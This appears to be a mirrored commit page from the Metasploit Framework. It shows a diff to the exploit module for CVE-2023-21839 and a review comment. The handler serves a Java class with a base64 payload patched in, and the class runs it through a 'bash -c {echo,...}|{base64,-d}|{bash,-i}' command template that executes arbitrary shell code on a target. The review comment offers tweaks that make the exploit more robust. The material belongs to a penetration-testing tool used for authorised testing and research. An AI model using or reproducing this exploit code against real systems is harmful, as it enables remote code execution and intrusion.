mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Slight efficiency improvements
parent
e80987ea59
commit
7ca7c6aee1
Binary file not shown.
@ -1,3 +1,5 @@
|
|||||||
|
import java.util.Base64;
|
||||||
|
|
||||||
public class PayloadRuns {
|
public class PayloadRuns {
|
||||||
static {
|
static {
|
||||||
try {
|
try {
|
||||||
@ -6,4 +8,4 @@ public class PayloadRuns {
|
|||||||
ex.printStackTrace();
|
ex.printStackTrace();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
agent = request.headers['User-Agent']
|
agent = request.headers['User-Agent']
|
||||||
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
||||||
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
|
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
|
||||||
class_raw = file.read
|
|
||||||
file.close
|
|
||||||
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
||||||
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
|
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
|
||||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
|
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
|
||||||
|
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
|
||||||
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
||||||
send_response(cli, 200, 'OK', class_raw)
|
send_response(cli, 200, 'OK', class_raw)
|
||||||
end
|
end
|
||||||
|
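Review bot: The search pattern `"\x00\x2C"` in the first `gsub` still hard-codes 44 independently of the new `exec_command_length`, so a later edit to the template string would leave the two out of step without raising any error. Deriving the pattern from the same value, `class_raw.gsub([exec_command_length].pack('n'), [command_length].pack('n'))`, keeps them tied together. A comment above `exec_command_length` should also state that the template must match the string compiled into `PayloadRuns.class`, which this page shows only as a binary change. Separately, `gsub` rewrites every occurrence of that byte pair in the class file rather than only the length prefix in front of the placeholder, and `pack('n')` wraps silently above 65535, so an explicit bounds check on `command_length` would turn a corrupted response into a visible failure. `on_request_uri` is fully visible in this hunk; the rest of the class is not.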